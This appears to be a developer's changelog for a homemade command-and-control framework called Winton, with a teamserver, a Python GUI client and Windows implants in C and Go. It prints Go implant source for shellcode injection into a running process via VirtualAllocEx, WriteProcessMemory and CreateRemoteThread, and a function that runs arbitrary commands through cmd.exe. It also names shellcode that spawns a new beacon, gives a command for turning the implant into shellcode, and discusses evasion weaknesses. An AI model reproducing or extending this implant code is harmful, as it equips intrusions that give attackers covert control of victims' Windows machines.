- add support for
inject
in new python gui (im lazy) - add support for
shell
in new python gui (im lazy) - autocomplete for python gui
- cat-ing an invalid file crashes implant
- upload/download using byte chunks
- split teamserver globals into config file (for easier deployment)
- central makefile?
- The client is written in Python with Tkinter, and is multithreaded to support multiple agents and asynchronous callbacks.
- Python API for Winton has been refactored to be more modular and easier to use (because I realized I had to convert the CLI client to a GUI).
- The client is still in early stages of development, and may or may not be stable.
-
2 new commands:
ps
andinject
ps
lists all running processes on the target as well as their PID, PPID, Name, Arch, Session & User.inject
injects shellcode into a running process viaCreateRemoteThread
Usage: inject <pid> <path_to_binfile>
Example: inject 17952 ../shellcode/calc/calc.bin
- The shellcode is loaded from a file, and is base64 encoded before being sent to the target.
- The shellcode is then decoded and injected into the target process via
CreateRemoteThread
var kernel32 = windows.NewLazySystemDLL("kernel32.dll") var ( virtualAllocEx = kernel32.NewProc("VirtualAllocEx") writeProcessMemory = kernel32.NewProc("WriteProcessMemory") createRemoteThread = kernel32.NewProc("CreateRemoteThread") WaitForSingleObject = kernel32.NewProc("WaitForSingleObject") closeHandle = kernel32.NewProc("CloseHandle") ) ... process_handle, err := windows.OpenProcess(..., uint32(pid), ...) ... addr, _, err := virtualAllocEx.Call(..., uintptr(len(shellcode)), ..., windows.PAGE_EXECUTE_READWRITE) // BAD ... _, _, err := writeProcessMemory.Call(..., addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) ... thread_handle, _, err := createRemoteThread.Call(uintptr(process_handle), 0, 0, addr, 0, 0, 0) closeHandle.Call(uintptr(thread_handle)) closeHandle.Call(uintptr(process_handle))
- OPSEC considerations (why this is a budget injection):
VirtualAllocEx
is called with PAGE_EXECUTE_READWRITE- Unbacked memory allocation
- Thread start address is 0x0
-
./shellcode/calc/calc.bin
is x64 shellcode that spawns calc.exe ~ thanks boku7 -
./shellcode/beacon/winton-win64.bin
is x64 shellcode that spawns a new beacon ~ thanks donut -- generated using exe2_csh
./exe2sh.py -i winton-win64.exe -o ./shellcode/beacon/winton-win64.bin
- The codebase has been refactored to be more modular and easier to read, (teamserver & go implant)
- Doesn't exactly follow Go best practices, but it's certainly better than before.
- The
teamserver
andimplant (go)
now have Makefiles and support for cross-compilation, see here and here for more info. - Added support for
shell
commands in beacon- Spawns
cmd.exe /c {task}
, not opsec safe.
- Spawns
func shell(command string) (string, error) {
cmd := exec.Command("cmd.exe", "/c", command)
stdout, err := cmd.Output()
if err != nil {
return "", err
}
return string(stdout), nil
}
- The new implant is written in Go.
- Although this was much more convenient to write, Golang binaries have the downside being much larger than C binaries.
- The C implant is 75KB, the Go implant is 7,165KB.
- The Go implant is also much more stable than the C implant, and has more features.
- The C implant will be removed in the future.
- Currently has support for 2 commands:
whoami
andls
- The agent is written in C and is extremely unstable! :D, and barely functional.
- This implant will probably be abandoned cos I hate parsing JSON in C, but this was a nice WinAPI sanity check.
- Currently only has support for
pwd
, but more commands will be added eventually.